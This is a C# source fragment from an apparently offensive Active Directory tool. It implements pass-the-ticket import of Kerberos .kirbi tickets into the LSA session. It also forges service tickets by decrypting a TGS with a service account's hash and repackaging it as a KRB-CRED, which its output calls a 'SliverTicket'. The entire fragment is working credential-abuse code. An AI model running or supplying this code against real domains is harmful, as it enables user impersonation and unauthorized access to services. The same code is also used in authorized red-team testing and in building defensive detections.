public static void PTT(string ticket)
{
Console.WriteLine("[*] Importing Ticket...");
if (Utils.Utils.IsBase64String(ticket))
{
var kirbiBytes = Convert.FromBase64String(ticket);
PrintFunc.PrintKirbi(ticket);
LSA.ImportTicket(kirbiBytes, new LUID());
Environment.Exit(0);
}
else if (File.Exists(ticket))
{
byte[] kirbiBytes = File.ReadAllBytes(ticket);
PrintFunc.PrintKirbi(Convert.ToBase64String(kirbiBytes));
LSA.ImportTicket(kirbiBytes, new LUID());
Environment.Exit(0);
}
else
{
Console.WriteLine("\r\n[x]Ticket must either be a .kirbi file or a base64 encoded .kirbi\r\n");
Environment.Exit(0);
}
}
//FROM TGS_REP
public static byte[] toKirbi(KrbTgsRep tgsRep, KrbEncTgsRepPart tgsDecryptedRepPart, bool ptt = false)
{
//KrbCredInfo::= SEQUENCE {
// key[0] EncryptionKey,
//prealm[1] Realm OPTIONAL,
//pname[2] PrincipalName OPTIONAL,
//flags[3] TicketFlags OPTIONAL,
//authtime[4] KerberosTime OPTIONAL,
//starttime[5] KerberosTime OPTIONAL,
//endtime[6] KerberosTime OPTIONAL
//renew - till[7] KerberosTime OPTIONAL,
//srealm[8] Realm OPTIONAL,
//sname[9] PrincipalName OPTIONAL,
//caddr[10] HostAddresses OPTIONAL
//}
var info = new KrbCredInfo()
{
Key = tgsDecryptedRepPart.Key,
Realm = tgsDecryptedRepPart.Realm,
PName = tgsRep.CName,
Flags = tgsDecryptedRepPart.Flags,
StartTime = tgsDecryptedRepPart.StartTime,
EndTime = tgsDecryptedRepPart.EndTime,
RenewTill = tgsDecryptedRepPart.RenewTill,
SRealm = tgsDecryptedRepPart.Realm,
SName = tgsDecryptedRepPart.SName
};
//EncKrbCredPart ::= [APPLICATION 29] SEQUENCE {
//ticket-info[0] SEQUENCE OF KrbCredInfo,
//nonce[1] INTEGER OPTIONAL,
//timestamp[2] KerberosTime OPTIONAL,
//usec[3] INTEGER OPTIONAL,
//s-address[4] HostAddress OPTIONAL,
//r-address[5] HostAddress OPTIONAL
//}
KrbCredInfo[] infos = { info };
var encCredPart = new KrbEncKrbCredPart()
{
TicketInfo = infos
};
//KRB-CRED ::= [APPLICATION 22] SEQUENCE {
//pvno[0] INTEGER,
//msg - type[1] INTEGER, --KRB_CRED
//tickets[2] SEQUENCE OF Ticket,
//enc - part[3] EncryptedData
//}
var myCred = new KrbCred();
myCred.ProtocolVersionNumber = 5;
myCred.MessageType = MessageType.KRB_CRED;
KrbTicket[] tickets = { tgsRep.Ticket };
myCred.Tickets = tickets;
var encryptedData = new KrbEncryptedData()
{
Cipher = encCredPart.EncodeApplication(),
};
myCred.EncryptedPart = encryptedData;
byte[] kirbiBytes = myCred.EncodeApplication().ToArray();
string kirbiString = Convert.ToBase64String(kirbiBytes);
if (ptt)
{
LSA.ImportTicket(kirbiBytes, new LUID());
}
return(kirbiBytes);
}
//FROM TGS
public static byte[] toKirbi(KrbTicket tgs, string srvName, string srvHash, EncryptionType etype, string service, bool ptt = false, bool verbose = false)
{
var kerbCred = new Utils.KerberosHashCreds(srvName, srvHash, etype);
var ticketDecrypted = tgs.EncryptedPart.Decrypt
(kerbCred.CreateKey(),
KeyUsage.Ticket,
b => KrbEncTicketPart.DecodeApplication(b));
//KrbCredInfo::= SEQUENCE {
// key[0] EncryptionKey,
//prealm[1] Realm OPTIONAL,
//pname[2] PrincipalName OPTIONAL,
//flags[3] TicketFlags OPTIONAL,
//authtime[4] KerberosTime OPTIONAL,
//starttime[5] KerberosTime OPTIONAL,
//endtime[6] KerberosTime OPTIONAL
//renew - till[7] KerberosTime OPTIONAL,
//srealm[8] Realm OPTIONAL,
//sname[9] PrincipalName OPTIONAL,
//caddr[10] HostAddresses OPTIONAL
//}
string srvHost = null;
if (srvName.Contains("$"))
{
srvHost = srvName.Replace("$", string.Empty) + "." + ticketDecrypted.CRealm;
}
else
{
srvHost = srvName;
}
var info = new KrbCredInfo()
{
Key = ticketDecrypted.Key,
Realm = ticketDecrypted.CRealm,
PName = ticketDecrypted.CName,
Flags = ticketDecrypted.Flags,
StartTime = ticketDecrypted.StartTime,
EndTime = ticketDecrypted.EndTime,
RenewTill = ticketDecrypted.RenewTill,
SRealm = ticketDecrypted.CRealm,
SName = new KrbPrincipalName()
{
Type = PrincipalNameType.NT_SRV_INST,
Name = new[] { service, srvHost }
}
};
//EncKrbCredPart ::= [APPLICATION 29] SEQUENCE {
//ticket-info[0] SEQUENCE OF KrbCredInfo,
//nonce[1] INTEGER OPTIONAL,
//timestamp[2] KerberosTime OPTIONAL,
//usec[3] INTEGER OPTIONAL,
//s-address[4] HostAddress OPTIONAL,
//r-address[5] HostAddress OPTIONAL
//}
KrbCredInfo[] infos = { info };
var encCredPart = new KrbEncKrbCredPart()
{
TicketInfo = infos
};
//KRB-CRED ::= [APPLICATION 22] SEQUENCE {
//pvno[0] INTEGER,
//msg - type[1] INTEGER, --KRB_CRED
//tickets[2] SEQUENCE OF Ticket,
//enc - part[3] EncryptedData
//}
var myCred = new KrbCred();
myCred.ProtocolVersionNumber = 5;
myCred.MessageType = MessageType.KRB_CRED;
KrbTicket[] tickets = { tgs };
myCred.Tickets = tickets;
//https://github.com/dirkjanm/krbrelayx/blob/master/lib/utils/kerberos.py#L220
//No Encryption for KRB-CRED
var encryptedData = new KrbEncryptedData()
{
Cipher = encCredPart.EncodeApplication()
};
myCred.EncryptedPart = encryptedData;
byte[] kirbiBytes = myCred.EncodeApplication().ToArray();
string kirbiString = Convert.ToBase64String(kirbiBytes);
if (ptt)
{
LSA.ImportTicket(kirbiBytes, new LUID());
}
else
{
Console.WriteLine("[+] SliverTicket Ticket Kirbi:");
Console.WriteLine(" - {0}", kirbiString);
}
if (verbose)
{
Console.WriteLine("[*] Ticket Info:");
PrintFunc.PrintKirbi(kirbiString);
}
return(kirbiBytes);
}
